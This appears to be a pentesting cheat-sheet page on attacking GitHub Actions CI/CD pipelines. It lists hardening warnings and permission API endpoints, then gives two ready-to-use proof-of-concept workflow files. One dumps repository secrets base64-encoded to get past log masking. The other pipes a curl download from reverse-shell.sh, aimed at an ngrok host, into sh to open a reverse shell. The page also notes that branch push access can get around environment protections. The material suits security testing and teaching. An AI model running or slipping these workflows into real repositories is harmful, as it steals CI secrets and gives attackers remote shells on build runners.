Skip to content

Github Actions

Github Actions

How well do you know GitHub Actions?
Leaking Secrets From GitHub Actions
Anyone can Access Deleted and Private Repository Data on GitHub
Vulnerable GitHub Actions Workflows Part 2: Actions That Open the Door to CI/CD Pipeline Attacks

Sensitive Files:
- .github/workflows

Checklist:
- Test Code that was gotten from a third party

Permissions

Github Permission Roles

Github API Permission Endpoints:
Get allowed actions for a specific Bearer token
Get the list of repositories for a specific Bearer token
Get default workflow permissions for a specific organization

Note

Check if you can fork the Repository

Warning

Make sure that workflows are limited/disabled for pull requests

Warning

Make sure the default permissions for an organization are readonly.

Create New Repo

Leads to a compromised GitHub

Write Privileges

Leads to a compromised GitHub

SSH Keys

Note

Check if user has ssh keys

GPG Keys

Note

Check if user has GPG keys

User Token

Example Auth using a user token

Bypass Environments Protections

If you can make a new branch or push code to a branch you can run a github action that will interact will all branches including the protected branch

PoC Git hub actions

List Secrets:

name: list_env
on:
  workflow_dispatch: # Launch manually
  pull_request: #Run it when a PR is created to any branch
    branches:
      - "**"
  push: # Run it when a push is made to any branch
    branches:
      - "**"
jobs:
  List_env:
    runs-on: ubuntu-latest
    steps:
      - name: List Env
        # Need to base64 encode or github will change the secret value for "***"
        run: sh -c 'env | grep "secret_" | base64 -w0'
        env:
          secret_myql_pass: ${{secrets.MYSQL_PASSWORD}}
          secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}}

Reverse Shell:

name: revshell
on:
  workflow_dispatch: # Launch manually
  pull_request: #Run it when a PR is created to the master branch
    branches:
      - master
  push: # Run it when a push is made to any branch
    branches:
      - "**"
jobs:
  create_pull_request:
    runs-on: ubuntu-latest
    steps:
      - name: Get Rev Shell
        run: sh -c 'curl https://reverse-shell.sh/2.tcp.ngrok.io:15217 | sh'
        env:
          secret_myql_pass: ${{secrets.MYSQL_PASSWORD}}
          secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}}